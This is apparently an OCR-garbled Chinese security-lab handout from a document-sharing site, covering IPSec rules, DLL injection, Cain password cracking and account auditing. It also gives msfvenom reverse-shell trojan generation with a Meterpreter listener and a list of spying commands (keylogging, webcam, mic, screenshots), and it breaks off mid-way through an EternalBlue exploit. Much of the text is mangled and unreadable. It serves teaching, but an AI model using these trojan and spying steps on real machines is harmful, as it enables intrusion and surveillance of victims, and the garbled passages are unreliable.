二 肖(上一(B) 下一(N)> 取消詹協(xié)議和端口指定此規(guī)則應(yīng)用的o

新建連接安全規(guī)則向?qū)?匡瞿步黎:規(guī)則類型燧逌類型要求陪邁終結(jié)點(diǎn)協(xié)議和端口百港文件名稱配器文件文件步黎:規(guī)則類型型要求結(jié)點(diǎn)和湍口.配贊文件名稱

?協(xié)議類(f_): "協(xié)(: l終結(jié)點(diǎn)1端口特定湍口 寸|煙 |示例:80,445,5000---50I0結(jié)點(diǎn)2口所有湍口 寸示例:80,445,5000---50I0<上步ll下一(!!))I 取消新即至接安全規(guī)則向?qū)?匡置何時(shí)應(yīng)用該規(guī)?回歸CDJ計(jì)算機(jī)連接到其企業(yè)因時(shí)應(yīng)用o已專用CPl計(jì)算機(jī)連接到專用網(wǎng)絡(luò)位巨l公用CU)計(jì)算機(jī)連接到公用網(wǎng)絡(luò)位贊時(shí)應(yīng)用o(步(!!)> 取消IPSecIPSecWindowsWindowsIPSecIPSec設(shè)置。在這個(gè)頁面中我們可以看到有三個(gè)配置選項(xiàng),IPSecIPSecIPSecIPSecIPSec擇相關(guān)算法的內(nèi)容。在一般情況下我們默認(rèn)選擇列表中較高位置的方法就可以了。我們還可以定義密鑰生存時(shí)間和會話數(shù)量來控制密鑰的使用范圍。我們接下來介紹一下數(shù)據(jù)保護(hù),我們依次點(diǎn)擊數(shù)據(jù)保護(hù)設(shè)置的“高級”和“自IPSecKerberosV5,KerberosV5協(xié)議可驗(yàn)證請求身份驗(yàn)證的用戶標(biāo)識V5V5IPSecIPSecInternet控制消息協(xié)議(ICMP)IPSecWindowsIPSecICMP,若要確保允許ICMP數(shù)據(jù)包通過Windows防火墻,還必須創(chuàng)建并啟用入站規(guī)則。IPSecIPSecWindowsIPSecWindows進(jìn)程注入大體上,進(jìn)程注入可以分為兩種形式:DLLShellcodeshellcodedllloadlibrary下面我們來演示一個(gè)DLL注入的過程。這里我們借助一個(gè)“InjectDLL”的工具,實(shí)現(xiàn)一個(gè)對于百度拼音輸入法進(jìn)程的注入,在注入成功后會彈出對話框,內(nèi)容是“DLL已進(jìn)入目標(biāo)進(jìn)程?!?、啟動任務(wù)管理器點(diǎn)擊開始?選擇運(yùn)行,如下圖所示:在彈出的對話框中,輸入“taskmgr”,如下圖所示:打開任務(wù)管理器后,找到“baidupinyin.exe*32”進(jìn)程,如下圖示:2、打開注入工具打開“InjectDLL-V1.0”文件夾,打開其中的“ProcessInject”可執(zhí)行文件。如圖:工具界面如下:3、開始注入打開注入工具后,首先點(diǎn)擊“選擇進(jìn)程”下拉框,在下拉框中找到“baidupinyin.exe”進(jìn)程并點(diǎn)擊選擇。DLL“Dll1在注入方式菜單下,選擇“遠(yuǎn)程線程注入”,點(diǎn)擊注入按鈕。如上圖所示,注入成功。4、注入結(jié)果查看在這里我們使用一個(gè)新的工具來查看我們對“baidupinyin.exe*32”進(jìn)程注入的效果,工具名稱“ProcessExplorer”。“procexp64點(diǎn)擊“View”,在下拉菜單中選擇“LowerPaneView”,點(diǎn)擊“DLLS”。在圖中窗口上部分找到“baidupinyin.exe”進(jìn)程并單擊,在窗口下部分就可以看到我們注入的dll文件,如圖中所示。WindowsWindows系統(tǒng)下Cain工具的使用Cain工具集成了多種功能,包括網(wǎng)絡(luò)攻擊、密碼破解、嗅探和分析等。它支持多種破解技術(shù),如字典攻擊、暴力破解、蠻力破解等。Cain還具有強(qiáng)大的工具還支持多種密碼哈希算法和加密算法,可以處理各種類型的密碼,包括WindowsFTPZIPRARPDFCainCain今天我們主要介紹下使用Cain工具破譯md5密文的方法。1、生成密文md5md5按圖中所示,輸入密文“123”,選擇“32位大”,點(diǎn)擊“加密”按鈕,得到所需的密文。2、破解密文CainCracker,MD5Hashes,在右側(cè)空白處左鍵點(diǎn)擊一下。按圖中依次操作,點(diǎn)擊“+”,輸入我們剛得到的密文,點(diǎn)擊“ok”按鈕。MD5Attack”(暴力破解)在彈出的對話框中點(diǎn)擊start,開始破解。圖中所示,我們得到了原文為:123此工具還有很多其他功能,今天我們就演示一個(gè)MD5密文破解功能,其他功能我們在后面實(shí)驗(yàn)中在進(jìn)行演示,更多功能同學(xué)們也可以在課下自己動手實(shí)驗(yàn)。Windows系統(tǒng)中使用Cain軟件實(shí)現(xiàn)帳戶審計(jì)CainCain&Oxid.itMicrosoftCainVOIP今天我們利用Cain工具中的破解功能來實(shí)現(xiàn)Windows賬戶的密碼審計(jì)工作。Windows操作系統(tǒng)把用戶名和密碼的哈希值存放在SAMAccountManageWindowsSyskey(系統(tǒng)密鑰)加密保護(hù)。WindowsLMHashesNTLMHashesLMHashesWindowsXP或WindowsServer2003等系統(tǒng)發(fā)行版本以及以下采用的加密方式(基本已經(jīng)被淘汰了),NTLMHashes在WindowsVista與WindowsServer2008下面我們來看看再Cain軟件中如何操作。CainCracker,LM&NTLMHashes,在彈出的對話框中,選擇從本地系統(tǒng)導(dǎo)入哈希值(ImportHashesfromlocalsystem),Next。從圖中我們可以看到,紅圈1中顯示所用用戶LM密碼列均為空,因?yàn)槲覀兪褂玫氖莣in7系統(tǒng),在win7系統(tǒng)里L(fēng)M加密方式已被棄用。紅圈2中顯示AdministratorguestNTLM3test8(Brute-Force再選擇NTLMHashes。在彈出的對話框中點(diǎn)擊Start。圖中紅圈處顯示破解的密碼,點(diǎn)擊Exit。Windows帳戶審計(jì)WindowsWindowsWindowsWindowsWindows以系統(tǒng)管理員身份登錄進(jìn)系統(tǒng),點(diǎn)擊“開始”按鈕,再打開“控制面板”。點(diǎn)擊“系統(tǒng)和安全”。點(diǎn)擊“管理工具”雙擊打開“本地安全策略”。先點(diǎn)擊“本地策略”,再點(diǎn)擊“審核策略”。在右側(cè)窗口中,雙擊“審核帳戶管理”,在彈出的窗口中,選中“成功”、“失敗”,確定。按上一節(jié)的方法,進(jìn)入“控制面板”,點(diǎn)擊“用戶帳戶和家庭安全”。點(diǎn)擊“添加或刪除用戶帳戶”點(diǎn)擊“創(chuàng)建一個(gè)新帳戶”“test此時(shí)我們可以在“管理帳戶”界面看到新創(chuàng)建的“test”標(biāo)準(zhǔn)帳戶。在打開的窗口中找到“事件查看器”并雙擊打開。Windowstest使用msfvenom生成反彈木馬Shell木馬實(shí)例當(dāng)我們需要往目標(biāo)主機(jī)上傳木馬文件時(shí),我們就可以利用msfvenomMetersploitshell,最終控制目標(biāo)主機(jī)。ifconfigIPIP8IP35在kali中啟動msfsurootrootrootrootmsfconsolemsfvenom1、 先查找使用的具體語句進(jìn)入程序后為了更準(zhǔn)確的編寫攻擊語句可以先進(jìn)入msf中利 用 search 進(jìn) 行 搜 索 具 體 的 使 用 語 句(payload/windows/meterpreter/reverse_tcpx86的windows機(jī)器,如需要攻擊x64windows機(jī)器可以利用payload/windows/x64/meterpreter/reverse_tcp)在終端處輸入searchmeterpreter/reverse_tcp,在返回的結(jié)果中可以看到結(jié)果11是本次實(shí)驗(yàn)所需要的攻擊語句2、 利用生成一個(gè)反彈shell的木馬msfvenom:back.exeshellWindowsshell28:4444metersploitmsfvenom-pwindows/meterpreter/reverse_tcpLHOST=28LPORT=4444-fexe-oback.exeppyopayload.-f是生成的后門的格式,-o是輸出文件名,LHOSTIP,LPORTshellback.exemsfconsolemataspolit3、 設(shè)置監(jiān)聽選項(xiàng)利用multi/handler進(jìn)行監(jiān)聽來自受害者35的反彈過來的shell,分別輸入命令useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetLHOST28setLPORT44444、 查看監(jiān)聽狀態(tài)showoptions5、 開啟監(jiān)聽在命令端中接著輸入run以開啟監(jiān)聽6、 在受害主機(jī)上運(yùn)行將生成的back.exe移至受害主機(jī),并在受害主機(jī)點(diǎn)擊運(yùn)行back.exe7.查看監(jiān)聽情況可以看到msf監(jiān)聽連接成功并創(chuàng)建meterpreter會話8.meterpreter簡單系統(tǒng)命令查看受害主機(jī)用戶getuid查看受害主機(jī)進(jìn)程在終端處輸入ps命令來獲取目標(biāo)主機(jī)上正在運(yùn)行的進(jìn)程信息查看受害主機(jī)系統(tǒng)信息在終端處輸入sysinfo以查看受害主機(jī)系統(tǒng)信息,可以看到受害主機(jī)是一臺系統(tǒng)為window7的主機(jī)對目標(biāo)主機(jī)進(jìn)行截圖在終端處輸入 screenshot 可以看到截圖保存在/home/admin123文件夾下查看截圖新打開一個(gè)終端,并在終端下輸入ls查看截圖是否存在查看受害主機(jī)畫面在終端處輸入runvnc可以遠(yuǎn)程實(shí)時(shí)監(jiān)控目標(biāo)機(jī)的畫面常用命令getuid查看當(dāng)前權(quán)限getsystem嘗試獲取system權(quán)限shellshell按名稱終止進(jìn)程kill按PID終止進(jìn)程reboot重啟shutdown關(guān)機(jī)upload上傳文件(格式參考:upload/root/1.txtd:/)download下載文件(格式參考:downloadc:/1.txt/root/)keyboard_send令對方鍵盤輸入(參考格式:keyboard_sendilovecc)#請按以下順序執(zhí)行keyscan_start開始捕獲擊鍵(開始鍵盤記錄)keyscan_dump轉(zhuǎn)儲按鍵緩沖(下載鍵盤記錄)keyscan_stop停止捕獲擊鍵(停止鍵盤記錄)#操作完都會有文件保存在服務(wù)器,一般是存在/rootmsfrecord_mic麥克風(fēng)錄制(格式參考:record_micd13)screenshot截圖截取對方目前桌面的截圖webcam_snap攝像頭拍攝一張照片webcam_stream持續(xù)監(jiān)控?cái)z像頭緩沖區(qū)溢出實(shí)例-永恒之藍(lán)實(shí)例分析實(shí)驗(yàn)環(huán)境準(zhǔn)備使用aliidsPaliig通實(shí)驗(yàn):、airoro。、aiipiigip為.wids7wi+dicgi。ip為.、ipaiaiscsleaif、sf6>serchs_0(s_0ai)、4aiiry/scaer/s//s0為、exlitwids/s/70etrnlle輸入eexlit/ids/sm/s__eeralle、setaldwids/x/e

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

最新文檔

評論

0/150

提交評論